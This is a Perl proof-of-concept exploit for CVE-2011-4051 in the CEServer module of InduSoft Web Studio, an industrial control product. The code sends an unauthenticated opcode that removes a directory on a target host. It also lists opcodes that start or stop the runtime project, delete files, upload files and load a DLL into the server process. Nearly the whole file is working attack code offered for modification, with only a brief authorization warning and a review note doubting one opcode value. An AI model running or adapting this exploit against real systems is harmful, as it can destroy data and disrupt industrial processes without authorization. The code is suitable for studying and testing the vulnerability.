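#!/usr/bin/perl
# PoC for CVE-2011-4051
# CEServer module in InduSoft Web Studio 6.1 and 7.0 allows an unauthenticated
# user to run commands: remove file/directory, send/update file, start/stop the
# runtime project, and load a DLL into the WebStudio process.
# Modify the script to suit your needs.
#
# Vulnerability discovered by Luigi Auriemma
# http://zerodayinitiative.com/advisories/ZDI-11-330/
# Celil Ünüver
# www.signalsec.com
#
# WARNING: the default opcode sent below (remove directory) is DESTRUCTIVE on
# the target. There is no authentication and no confirmation on the server side.
# Only run this against systems you are explicitly authorized to test.
#
# Usage: perl poc.pl [host] [port] [path]
#   host  defaults to 192.168.138.128
#   port  defaults to 4322 (CEServer)
#   path  defaults to C:\Python24 (the directory the request asks CEServer to remove)

use strict;
use warnings;
use IO::Socket;

# Wire protocol as far as this PoC exercises it: a single opcode byte followed
# by the opcode's argument (here, a path). The table below mirrors the original
# author's notes; only 'remove_dir' is exercised by this script.
# NOTE(review): the original notes list 0x01 as "update a file" but the script
# assigned 0x04 to its $sendfile tag -- confirm the correct value against the
# advisory before relying on 'send_file'.
my %opcode = (
    start_project => "\x07",   # start softplc runtime project
    stop_project  => "\x08",   # stop softplc runtime project
    remove_dir    => "\x10",   # remove directory
    remove_file   => "\x15",   # remove file
    load_dll      => "\x31",   # run/load DLL into the WebStudio process
    send_file     => "\x04",   # send/update a file (see NOTE above)
);

# Defaults preserve the original hard-coded values; command-line arguments
# override them so the script need not be edited for each target.
my $host = $ARGV[0] // "192.168.138.128";
my $port = $ARGV[1] // 4322;
my $data = $ARGV[2] // "C:\\Python24";

# The original used `|| "Unable to create socket"`, which silently turned a
# failed connect into a string and then tried to print to it. Die instead,
# and bound the connect so a filtered port does not hang the script forever.
my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 10,
) or die "Unable to create socket to $host:$port: $@\n";

# Build the request: opcode byte + target path. No length prefix or
# terminator is added because the original PoC sent none.
my $removedir = $opcode{remove_dir} . $data;

print {$sock} $removedir
    or die "Failed to send request to $host:$port: $!\n";

print "\nRemove-directory request sent to $host:$port for $data....\n";

# Close explicitly and check it: buffered write errors surface here.
close($sock) or die "Error closing socket: $!\n";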